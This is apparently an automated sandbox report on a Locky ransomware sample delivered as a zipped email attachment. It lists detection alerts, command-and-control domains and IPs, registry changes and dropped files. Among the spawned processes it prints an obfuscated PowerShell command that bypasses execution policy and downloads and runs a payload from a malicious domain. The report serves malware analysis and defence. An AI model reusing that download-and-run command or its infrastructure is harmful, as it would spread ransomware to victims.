EMAIL_98089542916705_rcook.zip
This report is generated from a file or URL submitted to this webservice on October 22nd 2016 07:11:29 (UTC) and action script Heavy Anti-Evasion
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1
Report generated by
Falcon Sandbox v5.30 © Hybrid Analysis
Incident Response
Risk Assessment
- Ransomware
-
Changes the desktop background picture
Contacts a domain associated with Tor hidden services - Spyware
-
Accesses potentially sensitive information from local browsers
POSTs files to a webserver - Persistence
- Spawns a lot of processes
- Fingerprint
-
Contains ability to lookup the windows account name
Reads the active computer name
Reads the cryptographic machine GUID
Reads the windows installation date - Evasive
- Executes WMI queries known to be used for VM detection
- Network Behavior
- Contacts 17 domains and 7 hosts. View all details
Additional Context
Related Sandbox Artifacts
- Associated SHA256s
- 7b870353dada7342ddf56a67da555b78aa54c9e6d4dff2163777ae75b808d3a2
Indicators
Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.
-
Malicious Indicators 15
-
Anti-Detection/Stealthyness
-
Writes to a desktop.ini file (often used to cloak folders)
- details
-
"eXe" wrote 67 bytes to file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\PQHTF1QU\desktop.ini" (Byte Offset: 0): [.ShellClassInfo]
UICLSID={7BD29E00-76C1-11CF-9DD0-00A0C9034933}
"eXe" wrote 67 bytes to file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\8RONKGG2\desktop.ini" (Byte Offset: 0): [.ShellClassInfo]
UICLSID={7BD29E00-76C1-11CF-9DD0-00A0C9034933}
"eXe" wrote 67 bytes to file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\HBYD8AA4\desktop.ini" (Byte Offset: 0): [.ShellClassInfo]
UICLSID={7BD29E00-76C1-11CF-9DD0-00A0C9034933}
"eXe" wrote 67 bytes to file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\Q15V3B25\desktop.ini" (Byte Offset: 0): [.ShellClassInfo]
UICLSID={7BD29E00-76C1-11CF-9DD0-00A0C9034933} - source
- API Call
- relevance
- 3/10
-
Writes to a desktop.ini file (often used to cloak folders)
-
External Systems
-
Detected Emerging Threats Alert
- details
-
Detected alert "ET TROJAN ABUSE.CH Locky Payment Domain Detected" (SID: 2023329, Rev: 1, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
Detected alert "ETPRO TROJAN Locky CnC checkin Aug 03 2016" (SID: 2821471, Rev: 2, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
Detected alert "ETPRO TROJAN Locky CnC checkin Aug 03 2016 M2" (SID: 2821569, Rev: 5, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
Detected alert "ETPRO TROJAN Ransomware Locky CnC Beacon Oct 3" (SID: 2822473, Rev: 2, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
Detected alert "ET POLICY PE EXE or DLL Windows file download HTTP" (SID: 2018959, Rev: 2, Severity: 1) categorized as "Potential Corporate Privacy Violation" - source
- Suricata Alerts
- relevance
- 10/10
-
Sample was identified as malicious by at least one Antivirus engine
- details
- 8/54 Antivirus vendors marked sample as malicious (14% detection rate)
- source
- External System
- relevance
- 8/10
-
Detected Emerging Threats Alert
-
Network Related
-
Contacts a domain associated with Tor hidden services
- details
-
"jhomitevd2abj3fk.onion.to"
"jhomitevd2abj3fk.tor2web.org" - source
- Network Traffic
- relevance
- 9/10
-
Malicious artifacts seen in the context of a contacted host
- details
-
Found malicious artifacts related to "91.200.14.124" (ASN: 35804, Owner: PP SKS-Lugan): ...
URL: http://91.200.14.124/apache_handler.php (AV positives: 1/68 scanned on 10/18/2016 03:08:15)
File SHA256: 68c53f0f091fcc898f5926e6d2fdeba5106bc995aab600f51339dbdec666808d (AV positives: 44/57 scanned on 10/21/2016 03:51:13)
Found malicious artifacts related to "185.102.136.77" (ASN: , Owner: ): ...
File SHA256: 68c53f0f091fcc898f5926e6d2fdeba5106bc995aab600f51339dbdec666808d (AV positives: 44/57 scanned on 10/21/2016 03:51:12)
Found malicious artifacts related to "52.84.13.157" (ASN: , Owner: ): ...
URL: http://get.ebiteblindl.club/http:/get.ebiteblindl.club/h_redir.php?offer_id=4&aff_id=1464&source=805&aff_sub=hienzo&aff_sub2=0&aff_sub3=0&aff_sub4=0&aff_sub5=1264537739&url=http%3A%2F%2Fget.ebiteblindl.club/offer.php%3FaffId%3D{aff_id}%26trackingId%3D63442546%26instId%3D805%26ho_trackingid%3D{transaction_id}%26cc%3D{country_code}%26cc_typ%3Dho%26sb%3Dx86%26wv%3Dxpsp3%26db%3DInternetExplorer%26uac%3D1%26cid%3D6965702ab625dd49ea1db1c0cda15a00%26v%3D1 (AV positives: 4/67 scanned on 06/27/2016 05:03:21)
URL: http://get.ebiteblindl.club/http:/get.ebiteblindl.club/h_redir.php?offer_id=4&aff_id=1903&source=1720&aff_sub=0&aff_sub2=0&aff_sub3=0&aff_sub4=0&aff_sub5=1293282864&url=http%3A%2F%2Fget.ebiteblindl.club/offer.php%3FaffId%3D{aff_id}%26trackingId%3D63298322%26instId%3D1720%26ho_trackingid%3D{transaction_id}%26cc%3D{country_code}%26cc_typ%3Dho%26sb%3Dx86%26wv%3Dxpsp3%26db%3DInternetExplorer%26uac%3D1%26cid%3D6965702ab625dd49ea1db1c0cda15a00%26v%3D1 (AV positives: 4/67 scanned on 06/27/2016 04:58:50)
URL: http://get.ebiteblindl.club/http:/get.ebiteblindl.club/offer.php?affId=1510&trackingId=63438117&instId=1029&ho_trackingid=1021117e8edc1825381eee3ea0ca0a&cc=FR&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=6965702ab625dd49ea1db1c0cda15a00&v=1 (AV positives: 4/67 scanned on 06/27/2016 04:58:44)
URL: http://get.ebiteblindl.club/http:/get.ebiteblindl.club/offer.php?affId=1510&trackingId=63439701&instId=1029&ho_trackingid=1021117e8edc1825381eee3ea0ca0a&cc=FR&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=6965702ab625dd49ea1db1c0cda15a00&v=1 (AV positives: 4/67 scanned on 06/27/2016 04:57:46)
URL: http://get.ebiteblindl.club/http:/get.ebiteblindl.club/offer.php?affId=1510&trackingId=63329523&instId=1029&ho_trackingid=1021117e8edc1825381eee3ea0ca0a&cc=FR&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=6965702ab625dd49ea1db1c0cda15a00&v=1 (AV positives: 4/67 scanned on 06/27/2016 04:53:56)
File SHA256: 19708551d44ea88a99b0221ee54f0c95503204baef4ad722323467f9e513ab0f (AV positives: 38/57 scanned on 06/23/2016 04:48:56)
File SHA256: df6793879bde70824a352cc743335ebeb52797b6f43f5697edc636f9a8a5b13b (AV positives: 1/57 scanned on 06/19/2016 18:20:35)
File SHA256: ead965b1b90ef1a9ebcb71c42779eb6423f64a4aac078db14913eeb147eb7f8c (AV positives: 37/55 scanned on 06/19/2016 05:09:48)
File SHA256: af8ca5b4b9faac819886396d800d32e898e0b361bae1e7f2dd27940485224c41 (AV positives: 10/56 scanned on 06/19/2016 05:08:53)
File SHA256: e64ce178118414c7b42aff064fd13be15eb3e27a6f6ba71b723e0b0039f0d7ad (AV positives: 39/56 scanned on 06/19/2016 05:06:43) - source
- Network Traffic
- relevance
- 10/10
-
Contacts a domain associated with Tor hidden services
-
Ransomware/Banking
-
Detected text artifact in screenshot that indicate file is ransomware
- details
-
"m.,dz'_1rd,_omitevd2ab-3fk.tor2web.or" (Source: screen_4.png, Indicator: "tor2web")
"decrypt" (Source: screen_4.png, Indicator: "decrypt") - source
- String
- relevance
- 8/10
-
Detected text artifact in screenshot that indicate file is ransomware
-
Spyware/Information Retrieval
-
Accesses potentially sensitive information from local browsers
- details
-
"eXe" had access to "%APPDATA%\Microsoft\Windows\Cookies\index.dat" (Type: "FileHandle")
"eXe" had access to "%LOCALAPPDATA%\Microsoft\Windows\History\History.IE5\index.dat" (Type: "FileHandle") - source
- Touched Handle
- relevance
- 5/10
-
Accesses potentially sensitive information from local browsers
-
Unusual Characteristics
-
Contains ability to reboot/shutdown the operating system
- details
-
ExitWindowsEx@USER32.DLL from PID 00002708
ExitWindowsEx@USER32.DLL from PID 00000600 - source
- Hybrid Analysis Technology
- relevance
- 5/10
-
Script connects to a host without prior DNS lookup
- details
-
Process "eXe" connected to "91.200.14.124" (Port: 52045, Protocol: TCP) without a DNS lookup
Process "eXe" connected to "185.102.136.77" (Port: 52046, Protocol: TCP) without a DNS lookup
Process "eXe" connected to "91.200.14.124" (Port: 52047, Protocol: TCP) without a DNS lookup
Process "eXe" connected to "185.102.136.77" (Port: 52048, Protocol: TCP) without a DNS lookup
Process "eXe" connected to "91.200.14.124" (Port: 52049, Protocol: TCP) without a DNS lookup
Process "firefox.exe" connected to "54.210.161.120" (Port: 52061, Protocol: TCP) without a DNS lookup
Process "firefox.exe" connected to "104.101.209.66" (Port: 52062, Protocol: TCP) without a DNS lookup
Process "firefox.exe" connected to "52.32.150.180" (Port: 52063, Protocol: TCP) without a DNS lookup
Process "firefox.exe" connected to "72.21.91.29" (Port: 52064, Protocol: TCP) without a DNS lookup
Process "firefox.exe" connected to "52.84.13.157" (Port: 52065, Protocol: TCP) without a DNS lookup
Process "firefox.exe" connected to "192.122.185.121" (Port: 52066, Protocol: TCP) without a DNS lookup
Process "firefox.exe" connected to "216.58.192.174" (Port: 52067, Protocol: TCP) without a DNS lookup
Process "firefox.exe" connected to "192.122.185.123" (Port: 52068, Protocol: TCP) without a DNS lookup
Process "firefox.exe" connected to "52.33.248.56" (Port: 52069, Protocol: TCP) without a DNS lookup
Process "firefox.exe" connected to "72.21.91.29" (Port: 52070, Protocol: TCP) without a DNS lookup
Process "firefox.exe" connected to "63.245.215.95" (Port: 52071, Protocol: TCP) without a DNS lookup - source
- Monitored Target
- relevance
- 10/10
-
Script file shows a combination of malicious behavior
- details
- The script produces internet activity is obfuscated and/or drops files
- source
- Indicator Combinations
- relevance
- 7/10
-
Spawns a lot of processes
- details
-
Spawned process "wscript.exe" with commandline ""C:\BILL_4531.js"" (Show Process)
Spawned process "cmd.exe" with commandline "/c p^oWer^sh^eLL.e^Xe ^-^eXecUtiOnPoLi^cY Byp^a^ss^ -^nO^PROFil^e^ -w^iNdOw^sty^Le^ hidd^en^ (New^-oBJect S^Ys^te^m^.^Net^.W^e^Bcl^I^ent).dO^w^nlOadfile(^'http://www.injusticeil.top/user.php?f=2.dat',^'%APPDATA%\eXe');st^art^-p^R^Oc^eSs^ %APPDATA%\eXe" (Show Process)
Spawned process "powershell.exe" with commandline "poWersheLL.eXe -eXecUtiOnPoLicY Bypass -nOPROFile -wiNdOwstyLe hidden (New-oBJect SYstem.Net.WeBclIent).dOwnlOadfile('http://www.injusticeil.top/user.php?f=2.dat','%APPDATA%\eXe');start-pROceSs %APPDATA%\eXe" (Show Process)
Spawned process "eXe" (Show Process)
Spawned process "eXe" (Show Process)
Spawned process "cmd.exe" with commandline "/C del /Q /F "%TEMP%\sysE5A3.tmp"" (Show Process)
Spawned process "helper.exe" with commandline "/SetAsDefaultAppUser" (Show Process) - source
- Monitored Target
- relevance
- 8/10
-
Contains ability to reboot/shutdown the operating system
-
Hiding 4 Malicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Suspicious Indicators 26
-
Anti-Detection/Stealthyness
-
Sets the process error mode to suppress error box
- details
-
"wscript.exe" set its error mode to SEM_NOOPENFILEERRORBOX
"helper.exe" set its error mode to SEM_NOOPENFILEERRORBOX - source
- API Call
- relevance
- 8/10
-
Sets the process error mode to suppress error box
-
Environment Awareness
-
Reads the cryptographic machine GUID
- details
-
"wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
"powershell.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
"firefox.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID") - source
- Registry Access
- relevance
- 10/10
-
Reads the windows installation date
- details
- "powershell.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION"; Key: "INSTALLDATE")
- source
- Registry Access
- relevance
- 10/10
-
Reads the cryptographic machine GUID
-
External Systems
-
Detected Emerging Threats Alert
- details
-
Detected alert "ET DNS Query to a *.pw domain - Likely Hostile" (SID: 2016778, Rev: 4, Severity: 2) categorized as "Potentially Bad Traffic"
Detected alert "ET POLICY DNS Query to .onion proxy Domain (tor2web)" (SID: 2015576, Rev: 7, Severity: 2) categorized as "Potentially Bad Traffic"
Detected alert "ET POLICY DNS Query to .onion proxy Domain (onion.to)" (SID: 2020116, Rev: 2, Severity: 2) categorized as "Potentially Bad Traffic"
Detected alert "ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download" (SID: 2016538, Rev: 3, Severity: 2) categorized as "Potentially Bad Traffic" - source
- Suricata Alerts
- relevance
- 10/10
-
Detected Emerging Threats Alert
-
General
-
Contains ability to find and load resources of a specific module
- details
-
LoadResource@KERNEL32.DLL from PID 00001264
FindResourceExW@KERNEL32.DLL from PID 00001264 - source
- Hybrid Analysis Technology
- relevance
- 1/10
-
POSTs files to a webserver
- details
-
"POST /apache_handler.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://91.200.14.124/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.200.14.124
Content-Length: 561
Connection: Keep-Alive" with no payload
"POST /apache_handler.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://185.102.136.77/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 185.102.136.77
Content-Length: 561
Connection: Keep-Alive" with no payload - source
- Network Traffic
- relevance
- 5/10
-
Reads configuration files
- details
-
"wscript.exe" read file "C:\Users\%USERNAME%\Desktop\desktop.ini"
"eXe" read file "C:\Users\%USERNAME%\Desktop\desktop.ini"
"eXe" read file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\PQHTF1QU\desktop.ini"
"eXe" read file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8RONKGG2\desktop.ini"
"eXe" read file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HBYD8AA4\desktop.ini"
"eXe" read file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Q15V3B25\desktop.ini"
"eXe" read file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D0YDZTO5\desktop.ini"
"eXe" read file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\E9S7QCHY\desktop.ini"
"eXe" read file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\QA0UPEJW\desktop.ini"
"eXe" read file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S9Y0GKU4\desktop.ini"
"helper.exe" read file "C:\Users\desktop.ini"
"helper.exe" read file "C:\Users\%USERNAME%\Desktop\desktop.ini"
"helper.exe" read file "%PROGRAMFILES%\desktop.ini" - source
- API Call
- relevance
- 4/10
-
Contains ability to find and load resources of a specific module
-
Installation/Persistance
-
Drops executable files
- details
-
"gmpopenh264.dll" has type "PE32 executable (DLL) (GUI) Intel 80386 for MS Windows"
"Roaming.eXe" has type "PE32 executable (GUI) Intel 80386 for MS Windows Nullsoft Installer self-extracting archive" - source
- Extracted File
- relevance
- 10/10
-
Writes a PE file header to disc
- details
-
"eXe" wrote 11776 bytes starting with PE header signature to file "%TEMP%\nsa2FE8.tmp\System.dll": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000e00000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...
"helper.exe" wrote 11264 bytes starting with PE header signature to file "%TEMP%\nsrDEA2.tmp\System.dll": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000d00000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...
"helper.exe" wrote 32768 bytes starting with PE header signature to file "%TEMP%\nsrDEA2.tmp\CityHash.dll": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000d80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...
"helper.exe" wrote 4608 bytes starting with PE header signature to file "%TEMP%\nsrDEA2.tmp\AppAssocReg.dll": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000c80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...
"helper.exe" wrote 4608 bytes starting with PE header signature to file "%TEMP%\nsrDEA2.tmp\ShellLink.dll": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000d80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ... - source
- API Call
- relevance
- 10/10
-
Drops executable files
-
Network Related
-
Found potential IP address in binary/memory
- details
-
"91.200.14.124"
"185.102.136.77"
Heuristic match: "?OpenH264 version:1.3.0.0" - source
- String
- relevance
- 3/10
-
Found potential IP address in binary/memory
-
Ransomware/Banking
-
Changes the desktop background picture
- details
-
"eXe" (Access type: "SETVAL"; Path: "HKCU\CONTROL PANEL\DESKTOP"; Key: "WALLPAPERSTYLE"; Value: "30000000")
"eXe" (Access type: "SETVAL"; Path: "HKCU\CONTROL PANEL\DESKTOP"; Key: "TILEWALLPAPER"; Value: "30000000") - source
- Registry Access
- relevance
- 10/10
-
Changes the desktop background picture
-
Spyware/Information Retrieval
-
Contains ability to open the clipboard
- details
-
OpenClipboard@USER32.DLL from PID 00002708
OpenClipboard@USER32.DLL from PID 00000600 - source
- Hybrid Analysis Technology
- relevance
- 10/10
-
Contains ability to open the clipboard
-
System Destruction
-
Marks file for deletion
- details
-
"%PROGRAMFILES%\Mozilla Firefox\uninstall\helper.exe" marked "%TEMP%\nscDDF6.tmp" for deletion
"%PROGRAMFILES%\Mozilla Firefox\uninstall\helper.exe" marked "%TEMP%\nsrDEA2.tmp" for deletion
"%PROGRAMFILES%\Mozilla Firefox\uninstall\helper.exe" marked "%TEMP%\nsrDEA2.tmp\AppAssocReg.dll" for deletion
"%PROGRAMFILES%\Mozilla Firefox\uninstall\helper.exe" marked "%TEMP%\nsrDEA2.tmp\CityHash.dll" for deletion
"%PROGRAMFILES%\Mozilla Firefox\uninstall\helper.exe" marked "%TEMP%\nsrDEA2.tmp\ShellLink.dll" for deletion
"%PROGRAMFILES%\Mozilla Firefox\uninstall\helper.exe" marked "%TEMP%\nsrDEA2.tmp\System.dll" for deletion - source
- API Call
- relevance
- 10/10
-
Opens file with deletion access rights
- details
-
"helper.exe" opened "%TEMP%\nscDDF6.tmp" with delete access
"helper.exe" opened "%TEMP%\nsrDEA2.tmp" with delete access
"helper.exe" opened "%TEMP%\nsrDEA2.tmp\AppAssocReg.dll" with delete access
"helper.exe" opened "%TEMP%\nsrDEA2.tmp\CityHash.dll" with delete access
"helper.exe" opened "%TEMP%\nsrDEA2.tmp\ShellLink.dll" with delete access
"helper.exe" opened "%TEMP%\nsrDEA2.tmp\System.dll" with delete access
"helper.exe" opened "%TEMP%\nsrDEA2.tmp\" with delete access - source
- API Call
- relevance
- 7/10
-
Marks file for deletion
-
System Security
-
Modifies proxy settings
- details
-
"wscript.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"wscript.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"powershell.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"powershell.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"eXe" (Access type: "SETVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYENABLE"; Value: "00000000")
"eXe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYSERVER")
"eXe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYOVERRIDE") - source
- Registry Access
- relevance
- 10/10
-
Queries sensitive IE security settings
- details
-
"wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
"powershell.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK") - source
- Registry Access
- relevance
- 8/10
-
Modifies proxy settings
-
Unusual Characteristics
-
Installs hooks/patches the running process
- details
-
"powershell.exe" wrote bytes "8a9b0b94" to virtual address "0x6AB31FDC" (part of module "MSCORWKS.DLL")
"powershell.exe" wrote bytes "92e6047779a80977be720977d62d09771de2047705a20977bee30477616f0977684107770050077700000000ad37b5758b2db575b641b57500000000" to virtual address "0x746A1000" (part of module "WSHTCPIP.DLL")
"powershell.exe" wrote bytes "4053077758580877186a0877653c09770000000000bfd5760000000056ccd576000000007ccad57600000000376833756a2c0977d62d097700000000206933750000000029a6d57600000000a48d337500000000f70ed57600000000" to virtual address "0x759A1000" (part of module "NSI.DLL")
"powershell.exe" wrote bytes "7739057779a80977be720977d62d09771de2047705a20977c868087757d10f77bee30477616f0977684107770050077700000000ad37b5758b2db575b641b57500000000" to virtual address "0x74BC1000" (part of module "WSHIP6.DLL")
"powershell.exe" wrote bytes "0857e2750478eb750000000051c11c7794981c77ee9c1c7775dc1e77273e1e77efb222770000000046ced576013dd67638edd676cfcdd5763123d576de2fd676c4cad57680bbd57652bad5769fbbd57692bbd57646bad5760abfd57600000000" to virtual address "0x67E61000" (part of module "SHFOLDER.DLL")
"eXe" wrote bytes "4d37d676f99cd57678ebd4761861d776fa8bd476d333d6760e45d676a41dd676d0d9d576e8d9d576013cd676e19cd5762b45d676b62fd6764123d57600bfd576000000006d42b07600000000ec22bf7699e5bc7600000000" to virtual address "0x10003000" (part of module "SYSTEM.DLL")
"eXe" wrote bytes "0857e2750478eb750000000051c11c7794981c77ee9c1c7775dc1e77273e1e77efb222770000000046ced576013dd67638edd676cfcdd5763123d576de2fd676c4cad57680bbd57652bad5769fbbd57692bbd57646bad5760abfd57600000000" to virtual address "0x6B271000" (part of module "SHFOLDER.DLL")
"eXe" wrote bytes "c2000000" to virtual address "0x1000405C" (part of module "SYSTEM.DLL")
"eXe" wrote bytes "92e6047779a80977be720977d62d09771de2047705a20977bee30477616f0977684107770050077700000000ad37b5758b2db575b641b57500000000" to virtual address "0x746A1000" (part of module "WSHTCPIP.DLL")
"eXe" wrote bytes "4053077758580877186a0877653c09770000000000bfd5760000000056ccd576000000007ccad57600000000376833756a2c0977d62d097700000000206933750000000029a6d57600000000a48d337500000000f70ed57600000000" to virtual address "0x759A1000" (part of module "NSI.DLL")
"eXe" wrote bytes "7739057779a80977be720977d62d09771de2047705a20977c868087757d10f77bee30477616f0977684107770050077700000000ad37b5758b2db575b641b57500000000" to virtual address "0x74BC1000" (part of module "WSHIP6.DLL")
"helper.exe" wrote bytes "e19cd576f99cd57678ebd47600bfd576fa8bd4761861d776d333d6760e45d676e74bd776e8d9d576eba8d576013cd6764d37d6762b45d676b62fd6764123d576d0d9d576000000006d42b0760000000099e5bc76ec22bf7600000000" to virtual address "0x10003000" (part of module "SYSTEM.DLL")
"helper.exe" wrote bytes "0857e2750478eb750000000051c11c7794981c77ee9c1c7775dc1e77273e1e77efb222770000000046ced576013dd67638edd676cfcdd5763123d576de2fd676c4cad57680bbd57652bad5769fbbd57692bbd57646bad5760abfd57600000000" to virtual address "0x6B041000" (part of module "SHFOLDER.DLL")
"helper.exe" wrote bytes "002100000c2100001a210000282100003421000040210000000000005c210000000000007421000000000000" to virtual address "0x006D2000" (part of module "RPCSS.DLL")
"helper.exe" wrote bytes "c2000000" to virtual address "0x10004020" (part of module "SYSTEM.DLL") - source
- Hook Detection
- relevance
- 10/10
-
Reads information about supported languages
- details
-
"wscript.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
"cmd.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
"firefox.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409") - source
- Registry Access
- relevance
- 3/10
-
Installs hooks/patches the running process
-
Hiding 8 Suspicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Informative 25
-
Anti-Reverse Engineering
-
Contains ability to register a top-level exception handler (often used as anti-debugging trick)
- details
- SetUnhandledExceptionFilter@KERNEL32.DLL from PID 00001264
- source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Contains ability to register a top-level exception handler (often used as anti-debugging trick)
-
Environment Awareness
-
Contains ability to query machine time
- details
- GetSystemTimeAsFileTime@KERNEL32.DLL from PID 00001264
- source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Contains ability to query the machine version
- details
-
GetVersionExA@KERNEL32.DLL from PID 00001264
GetVersionExA@KERNEL32.DLL from PID 00001264
GetVersion@KERNEL32.DLL from PID 00002708
GetVersion@KERNEL32.DLL from PID 00000600
GetVersionExW@KERNEL32.DLL from PID 00000600 - source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Contains ability to query volume size
- details
-
GetDiskFreeSpaceW@KERNEL32.DLL from PID 00002708
GetDiskFreeSpaceW@KERNEL32.DLL from PID 00000600 - source
- Hybrid Analysis Technology
- relevance
- 3/10
-
Executes WMI queries
- details
- "firefox.exe" issued a query "SELECT * FROM Win32_BIOS0"
- source
- API Call
- relevance
- 10/10
-
Possibly tries to detect the presence of a debugger
- details
-
GetProcessHeap@KERNEL32.DLL from PID 00001264
GetProcessHeap@KERNEL32.DLL from PID 00001264 - source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Contains ability to query machine time
-
General
-
Contacts domains
- details
-
"www.injusticeil.top"
"ciscobinary.openh264.org"
"dsybuxulplscgeonv.xyz"
"yitmxwhryykuuj.click"
"taulmkeuktvxhe.xyz"
"tyoycmkymaty.pl"
"jhomitevd2abj3fk.onion.to"
"udynanrpxqbxrosop.click"
"jrhkejh.click"
"ovpgfkt.info"
"www.torproject.org"
"jbajudsmkrurhnyu.pl"
"jdptstkrjiowdqvgi.pw"
"jhomitevd2abj3fk.tor2web.org"
"en.wikipedia.org"
"pccwuntpqx.click"
"efympeet.xyz" - source
- Network Traffic
- relevance
- 1/10
-
Contacts server
- details
-
"172.245.9.41:80"
"91.200.14.124:80"
"185.102.136.77:80"
"52.32.150.180:443"
"52.84.13.157:443"
"192.122.185.121:443"
"192.122.185.123:443" - source
- Network Traffic
- relevance
- 1/10
-
Contains PDB pathways
- details
- "wscript.pdb"
- source
- String
- relevance
- 1/10
-
Creates a writable file in a temporary directory
- details
-
"helper.exe" created file "%TEMP%\nsrDEA2.tmp\System.dll"
"helper.exe" created file "%TEMP%\nsrDEA2.tmp\CityHash.dll"
"helper.exe" created file "%TEMP%\nsrDEA2.tmp\AppAssocReg.dll"
"helper.exe" created file "%TEMP%\nsrDEA2.tmp\ShellLink.dll" - source
- API Call
- relevance
- 1/10
-
Creates mutants
- details
-
"\Sessions\1\BaseNamedObjects\Local\ZonesCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZoneAttributeCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Global\.net clr networking"
"\Sessions\1\BaseNamedObjects\RasPbFile"
"\Sessions\1\BaseNamedObjects\{C20CD437-BA6D-4ebb-B190-70B43DE3B0F3}"
